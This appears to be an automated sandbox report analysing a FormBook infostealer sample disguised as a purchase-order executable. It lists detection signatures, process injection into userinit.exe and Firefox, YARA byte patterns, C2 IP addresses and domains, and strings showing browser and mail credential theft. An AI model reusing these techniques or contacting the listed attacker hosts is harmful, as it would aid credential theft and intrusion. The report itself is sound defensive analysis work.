Windows Analysis Report
PO-000001488.exe

Overview

General Information

Sample name: PO-000001488.exe
Analysis ID: 1516889
MD5: ddc551bb780301787ee4cc982af331a9
SHA1: 06ddf68af0fdfdb756cf876c36a183f3411166f0
SHA256: 557195c150cfc25ab58399c7067bd4abf90afa511b68c5ad6bddcc829e1455b0
Tags: exeuser-lowmal3
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Uncommon Userinit Child Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Userinit Child Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO-000001488.exe (PID: 2056 cmdline: "C:\Users\user\Desktop\PO-000001488.exe" MD5: DDC551BB780301787EE4CC982AF331A9)
    • PO-000001488.exe (PID: 4032 cmdline: "C:\Users\user\Desktop\PO-000001488.exe" MD5: DDC551BB780301787EE4CC982AF331A9)
      • MpfhURuSBZcuS.exe (PID: 5996 cmdline: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • userinit.exe (PID: 4676 cmdline: "C:\Windows\SysWOW64\userinit.exe" MD5: 24892AC6E39679E3BD3B0154DE97C53A)
          • MpfhURuSBZcuS.exe (PID: 6360 cmdline: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4176 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2be20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2be20:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13eaf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
3.2.PO-000001488.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.PO-000001488.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2eff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17082:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
3.2.PO-000001488.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.PO-000001488.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e1f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16282:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started, Author: Tom Ueltschi (@c_APT_ure), Tim Shelton, Data: Command: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" , CommandLine: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe, NewProcessName: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe, OriginalFileName: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe, ParentCommandLine: "C:\Windows\SysWOW64\userinit.exe", ParentImage: C:\Windows\SysWOW64\userinit.exe, ParentProcessId: 4676, ParentProcessName: userinit.exe, ProcessCommandLine: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" , ProcessId: 6360, ProcessName: MpfhURuSBZcuS.exe
            Source: Process started, Author: Florian Roth (Nextron Systems), Samir Bousseaden (idea), Data: Command: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" , CommandLine: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe, NewProcessName: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe, OriginalFileName: C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe, ParentCommandLine: "C:\Windows\SysWOW64\userinit.exe", ParentImage: C:\Windows\SysWOW64\userinit.exe, ParentProcessId: 4676, ParentProcessName: userinit.exe, ProcessCommandLine: "C:\Program Files (x86)\CgEFJlVueYoFVNGMrHEvgxGdoSqTRCWfXpqWIUEFCqRiYrSDDYW\MpfhURuSBZcuS.exe" , ProcessId: 6360, ProcessName: MpfhURuSBZcuS.exe
            Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
            2024-09-24T17:17:19.548794+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 63689 | 188.114.97.3 | 80 | TCP
            2024-09-24T17:17:43.191949+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 63693 | 199.59.243.227 | 80 | TCP
            2024-09-24T17:17:56.931031+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 63700 | 198.252.106.191 | 80 | TCP
            2024-09-24T17:18:10.103482+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 63704 | 3.33.130.190 | 80 | TCP
            2024-09-24T17:18:23.779067+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 63708 | 148.251.114.233 | 80 | TCP
            2024-09-24T17:18:37.074245+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 63712 | 209.74.95.29 | 80 | TCP
            2024-09-24T17:18:50.786085+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 63716 | 199.59.243.227 | 80 | TCP
            2024-09-24T17:19:03.958791+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 63720 | 3.33.130.190 | 80 | TCP
            2024-09-24T17:19:25.919517+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 63724 | 52.223.13.41 | 80 | TCP
            2024-09-24T17:19:40.565485+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 63728 | 38.47.232.144 | 80 | TCP

            AV Detection

            Source: PO-000001488.exe, Avira: detected
            Source: PO-000001488.exe, ReversingLabs: Detection: 65%
            Source: Yara match, File source: 3.2.PO-000001488.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 3.2.PO-000001488.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: PO-000001488.exe, Joe Sandbox ML: detected
            Source: PO-000001488.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: PO-000001488.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MpfhURuSBZcuS.exe, 00000007.00000002.3307759780.00000000004BE000.00000002.00000001.01000000.0000000C.sdmp, MpfhURuSBZcuS.exe, 00000009.00000000.1835592215.00000000004BE000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO-000001488.exe, 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.1769373657.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.1771308677.0000000003144000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO-000001488.exe, PO-000001488.exe, 00000003.00000002.1769758693.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, userinit.exe, 00000008.00000003.1769373657.0000000002F9D000.00000004.00000020.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.00000000032F0000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309189641.000000000348E000.00000040.00001000.00020000.00000000.sdmp, userinit.exe, 00000008.00000003.1771308677.0000000003144000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: userinit.pdb source: PO-000001488.exe, 00000003.00000002.1769358600.0000000001047000.00000004.00000020.00020000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000002.3308355650.0000000001168000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: userinit.pdbGCTL source: PO-000001488.exe, 00000003.00000002.1769358600.0000000001047000.00000004.00000020.00020000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000007.00000002.3308355650.0000000001168000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 8_2_00ABC290 FindFirstFileW,FindNextFileW,FindClose, 8_2_00ABC290
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 4x nop then xor eax, eax, 8_2_00AA9B50
            Source: C:\Windows\SysWOW64\userinit.exe, Code function: 4x nop then mov ebx, 00000004h, 8_2_032304DE

            Networking

            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63724 -> 52.223.13.41:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63708 -> 148.251.114.233:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63704 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63720 -> 3.33.130.190:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63712 -> 209.74.95.29:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63693 -> 199.59.243.227:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63700 -> 198.252.106.191:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63689 -> 188.114.97.3:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63728 -> 38.47.232.144:80
            Source: Network traffic, Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:63716 -> 199.59.243.227:80
            Source: DNS query: www.suarahati20.xyz
            Source: Joe Sandbox View, IP Address: 188.114.97.3
            Source: Joe Sandbox View, ASN Name: MULTIBAND-NEWHOPEUS
            Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox View, ASN Name: HAWKHOSTCA
            Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Tue, 24 Sep 2024 15:18:15 GMT | server: LiteSpeed
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Tue, 24 Sep 2024 15:18:18 GMT | server: LiteSpeed
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Tue, 24 Sep 2024 15:18:21 GMT | server: LiteSpeed
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1238 | date: Tue, 24 Sep 2024 15:18:23 GMT | server: LiteSpeed
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Sep 2024 15:18:29 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 13928 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Sep 2024 15:18:31 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 13928 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Sep 2024 15:18:34 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 13928 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 24 Sep 2024 15:18:36 GMT | Server: Apache | X-Frame-Options: SAMEORIGIN | Content-Length: 13928 | X-XSS-Protection: 1; mode=block | Connection: close | Content-Type: text/html; charset=utf-8
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 24 Sep 2024 15:19:32 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66ea4ae9-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 24 Sep 2024 15:19:34 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66ea4ae9-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 24 Sep 2024 15:19:37 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66ea4ae9-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 24 Sep 2024 15:19:40 GMT | Content-Type: text/html | Content-Length: 148 | Connection: close | ETag: "66ea4ae9-94" | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: userinit.exe, 00000008.00000002.3311803210.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309629931.0000000003E96000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.00000000036E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2107922191.0000000038536000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: http://156.226.108.98:58888/
            Source: userinit.exe, 00000008.00000002.3309629931.00000000044DE000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003D2E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.litespeedtech.com/error-page
            Source: MpfhURuSBZcuS.exe, 00000009.00000002.3311216289.000000000561B000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.yu35n.top
            Source: MpfhURuSBZcuS.exe, 00000009.00000002.3311216289.000000000561B000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.yu35n.top/wqu9/
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://fonts.gstatic.com
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://htmlcodex.com
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004670000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003EC0000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://htmlcodex.com/credit-removal
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: userinit.exe, 00000008.00000003.1997730127.0000000007C66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C74000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: userinit.exe, 00000008.00000002.3307941539.0000000000C9C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: userinit.exe, 00000008.00000002.3309629931.0000000003E96000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.00000000036E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2107922191.0000000038536000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://t.me/AG09999
            Source: userinit.exe, 00000008.00000002.3312021634.0000000007D38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
            Source: userinit.exe, 00000008.00000002.3309629931.0000000004028000.00000004.10000000.00040000.00000000.sdmp, userinit.exe, 00000008.00000002.3311803210.00000000061C0000.00000004.00000800.00020000.00000000.sdmp, userinit.exe, 00000008.00000002.3309629931.0000000004802000.00000004.10000000.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000003878000.00000004.00000001.00040000.00000000.sdmp, MpfhURuSBZcuS.exe, 00000009.00000002.3309095890.0000000004052000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://www.google.com

            E-Banking Fraud

            Source: Yara match File source: 3.2.PO-000001488.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 3.2.PO-000001488.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.3307756614.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1769630236.00000000013A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1769083261.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000008.00000002.3308999188.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.1770519170.0000000003FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000009.00000002.3311216289.00000000055A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000007.00000002.3308933092.00000000057C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 3.2.PO-000001488.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 3.2.PO-000001488.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3308944674.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
